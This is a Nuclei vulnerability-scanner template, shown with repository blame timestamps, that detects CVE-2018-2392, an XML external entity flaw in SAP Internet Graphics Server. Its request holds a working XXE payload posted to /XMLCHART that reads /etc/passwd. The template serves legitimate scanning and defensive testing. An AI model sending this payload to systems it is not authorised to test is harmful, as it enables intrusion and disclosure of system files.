nuclei-templates/http/cves/2018/CVE-2018-2392.yaml

97 lines
3.1 KiB
YAML
Raw Normal View History

2021-07-05 16:40:37 +00:00
id: CVE-2018-2392
info:
name: SAP Internet Graphics Server (IGS) - XML External Entity Injection
2021-07-05 16:40:37 +00:00
author: _generic_human_
severity: high
description: |
SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
2021-07-05 16:40:37 +00:00
reference:
- https://launchpad.support.sap.com/#/notes/2525222
- https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/
- https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/
- https://troopers.de/troopers18/agenda/3r38lr/
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
- https://nvd.nist.gov/vuln/detail/CVE-2018-2392
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2018-2392
cwe-id: CWE-611
2023-07-11 19:49:27 +00:00
epss-score: 0.0032
cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: sap
product: internet_graphics_server
tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive
2021-07-05 16:40:37 +00:00
http:
2021-07-05 16:40:37 +00:00
- raw:
- |
POST /XMLCHART HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary={{randstr_1}}
--{{randstr_1}}
Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml"
Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8'?>
<ChartData>
<Categories>
<Category>ALttP</Category>
</Categories>
<Series label="{{randstr_4}}">
<Point>
<Value type="y">12345</Value>
</Point>
</Series>
</ChartData>
--{{randstr_1}}
Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml"
Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE Extension [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<SAPChartCustomizing version="1.1">
<Elements>
<ChartElements>
<Title>
<Extension>&xxe;</Extension>
</Title>
</ChartElements>
</Elements>
</SAPChartCustomizing>
--{{randstr_1}}--
matchers-condition: and
matchers:
- type: word
part: body
2023-07-11 19:49:27 +00:00
words:
- Picture
- Info
- /output/
2021-07-05 16:40:37 +00:00
condition: and
- type: word
part: body
2023-07-11 19:49:27 +00:00
words:
- ImageMap
- Errors
2021-07-05 16:40:37 +00:00
condition: or
2023-07-11 19:49:27 +00:00
- type: word
part: header
words:
- text/html
- SAP Internet Graphics Server
condition: and
2021-07-05 16:40:37 +00:00
- type: status
status:
- 200
2023-07-12 11:56:50 +00:00
# file name - /etc/passwd